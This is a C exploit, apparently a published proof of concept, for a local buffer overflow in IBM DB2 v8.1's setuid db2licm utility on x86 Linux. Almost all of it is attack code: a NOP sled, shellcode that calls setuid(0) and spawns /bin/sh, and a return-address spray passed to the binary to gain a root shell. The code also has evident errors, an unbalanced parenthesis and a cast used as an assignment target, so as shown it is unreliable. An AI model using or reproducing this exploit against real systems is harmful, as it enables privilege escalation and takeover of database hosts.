/*
** IBM DB2 v8.1 - db2licm local buffer overflow exploit
** for x86 Linux
**
** This vulnerability was discovered by Juan Pablo Martinez
** Kuhn from Core Security Technologies in version 7.2, but
** the problem is still there in version 8.1, except we
** must stuff about 3 times as much data into the buffer.
**
** The exploit should work up to fix pack 4, bearing in
** mind the permissions by default are -r-sr-x---, so we
** need to be in the same group as the binary (db2grp1)
** to execute.
**
** Author: Jonathan So [ jonny [ @ ] nop-art.net ]
**
** Usage:
** 	tested on SuSE 8.0: ./db2licm-exp 4000
*/

#include <stdlib.h>

#define STACK_TOP 0xC0000000
#define DB2LICM "/home/db2inst1/sqllib/adm/db2licm"

int main(int argc, char **argv)
{

	char shellcode[]=
		"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
		"\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
		"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
		"\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

	char *longbuff;
	int i;
	long *long_ptr;

	if (argc<2) {
		printf("usage: %s [offset]\n", argv[0]);
		exit(1);
	}

	longbuff = (char *) malloc(3200);
	(void *)long_ptr = longbuff+2;

	for (i=0;i<3200;i+=4) {
		*(long *)(long_ptr) = STACK_TOP - atoi(argv[1]));
		long_ptr++;
	}

	for(i=0;i<2000;i++) longbuff[i] = 0x90;
	memcpy(longbuff+2000, shellcode, strlen(shellcode));
	longbuff[3199] = 0x00;

	execl(DB2LICM, DB2LICM, longbuff, NULL);
}